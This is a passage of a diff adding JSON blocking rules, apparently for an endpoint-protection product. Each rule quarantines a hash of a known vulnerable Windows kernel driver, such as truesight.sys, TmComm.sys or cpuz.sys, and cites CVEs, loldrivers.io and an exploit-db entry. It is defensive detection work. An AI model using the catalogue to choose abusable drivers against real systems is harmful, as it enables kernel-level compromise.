+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830981Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "efb1587c1b1ea61a10a68da83b386808102f29253a16339e10b6bfd9c69eaaee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92d2048f-b835-5883-aa6e-8cd362a2ecbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973432Z",
+ "creation_date": "2026-03-23T11:45:29.973434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973440Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fca10cde7d331b7f614118682d834d46125a65888e97bd9fda2df3f15797166c",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92d3bbf8-8947-5dac-8f45-9917ccdb5106",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481604Z",
+ "creation_date": "2026-03-23T11:45:30.481606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481612Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba40b1fc798c2f78165e78997b4baf3d99858ee39a372ca6fbc303057793e50d",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92deb819-4ef7-596b-8fc9-663a54848c4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828050Z",
+ "creation_date": "2026-03-23T11:45:31.828053Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84107d0c7ccd6f88aaa50f4c5185e33df14d16ebf874051c8c0d56ae4d653fb6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92e7fc75-7718-527d-8a19-5c4a38ae1735",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499082Z",
+ "creation_date": "2026-03-23T11:45:31.499085Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499093Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "419e0a1e0ba3e06442a0076e289e11bfd2566aa1a818787b3231fd64d845d2b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "92ec7335-c17a-5597-ac00-0f389d1137b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481776Z",
+ "creation_date": "2026-03-23T11:45:31.481780Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63a12cbb24bb2fa057b700fd2c59f24ce916c2124ca193b987e2079fa235c15c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9304882d-d209-51cc-ab16-8101699cb390",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472842Z",
+ "creation_date": "2026-03-23T11:45:30.472845Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2298e838e3c015aedfb83ab18194a2503fe5764a862c294c8b39c550aab2f08e",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93049b59-d24d-51ac-9901-45f198e9be4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152364Z",
+ "creation_date": "2026-03-23T11:45:31.152367Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "721ab9d65148c5f29f0bc716ce7bbf8159f268108201f50e552bf5ead290cbaf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "931c31c7-03de-5107-9385-17fee16a6bdd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472171Z",
+ "creation_date": "2026-03-23T11:45:31.472176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7d1d1058ebae552d0f030e059b61865d00e0a7227a42024d6e05b1f8b04657b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9321d471-67b6-5357-b93b-38cd0c5c6839",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140319Z",
+ "creation_date": "2026-03-23T11:45:31.140323Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140331Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae4d56428c041fc6a35f79926f9792103042c41a2a64a334b6318d64430cf13c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "932bbe4c-1aaa-57fb-8eed-9fbcc8737645",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823394Z",
+ "creation_date": "2026-03-23T11:45:30.823398Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823407Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97153fdb315e84580b49aeb66709c419979c26b3ded5f2b4142245c18548eeb1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "933144b2-4e34-5448-9eab-d57143439810",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160777Z",
+ "creation_date": "2026-03-23T11:45:31.160779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160784Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "094476116a7905fb52057dbfdbb6e37a0a46da61123ac86faefe67b41f7edd7b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "933338b2-0b96-5640-916d-5d55fb1fc725",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817790Z",
+ "creation_date": "2026-03-23T11:45:31.817794Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817802Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e28fd8e85a380cf4e6abc08cb7e0cb98649a96fa835f8d613bc7ca350e93505",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "933352f8-27af-5cf2-8223-1f6b1a8a63ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461239Z",
+ "creation_date": "2026-03-23T11:45:30.461242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461251Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "103c1735b0ad3fc22070c3268580cd3fdbef0129a787dbc51bd5d36639515a8f",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/6c0c60f0-895d-428a-a8ae-e10390bceb12/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "933356d5-d044-5fff-a472-75966216d56c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606593Z",
+ "creation_date": "2026-03-23T11:45:29.606595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606600Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd2d79f3930dab33ec2851c16da7e3043dd819df1592d965ee9d52b91b44ea4c",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "933ca585-c379-5629-b4c7-616612d47581",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614822Z",
+ "creation_date": "2026-03-23T11:45:29.614824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614829Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a9706e320179993dade519a83061477ace195daa1b788662825484813001f526",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "933dafec-878a-5763-a98a-fd81f3cc2e71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620478Z",
+ "creation_date": "2026-03-23T11:45:29.620480Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620486Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93420501-6efa-5945-aab5-966a810195ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471440Z",
+ "creation_date": "2026-03-23T11:45:30.471443Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471452Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0897935ff2e0e7cc23a036ec0791d587b4799a299c8d6d65f364a8bdff645760",
+ "comment": "Vulnerable Kernel Driver (aka tfbfs3ped.sys) [https://www.loldrivers.io/drivers/500e07cb-77c6-4e83-ae3f-73f70f1c10b5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "934a8a7a-cce6-5942-854a-409a5e87dc18",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471715Z",
+ "creation_date": "2026-03-23T11:45:31.471718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471728Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47d2122b487192f6b36f6bcb6b1ff8d3f5c5d2a0088918c88ff2abda965998a0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "935b54e9-353e-5786-9cd6-2df2e52cd2fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497725Z",
+ "creation_date": "2026-03-23T11:45:31.497728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9470208b5df920296d2e006666d56010dc2281298ff9496d3049e6f5cce3301c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9375c93f-645a-5a0d-b7ae-6bdba5540681",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830546Z",
+ "creation_date": "2026-03-23T11:45:30.830548Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830553Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e975e5164f58cd8a540406fd3af42e53ffab7fef8caa9b0c02b6ae45dc35b49",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "937b703e-2e84-5f79-b8c0-0a913c8eef8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142727Z",
+ "creation_date": "2026-03-23T11:45:32.142729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c71f2fc9b795c39a73c4dcdd3ad2b7e1204eec3e783d43e47dd72814d33739cd",
+ "comment": "Vulnerable IKARUS anti.virus Driver (aka ntguard.sys and ntguard_x64.sys) [https://www.greyhathacker.net/?p=995, https://www.exploit-db.com/exploits/43139] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93876cc1-b785-53da-8156-ccef9d16df3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604464Z",
+ "creation_date": "2026-03-23T11:45:29.604466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604472Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
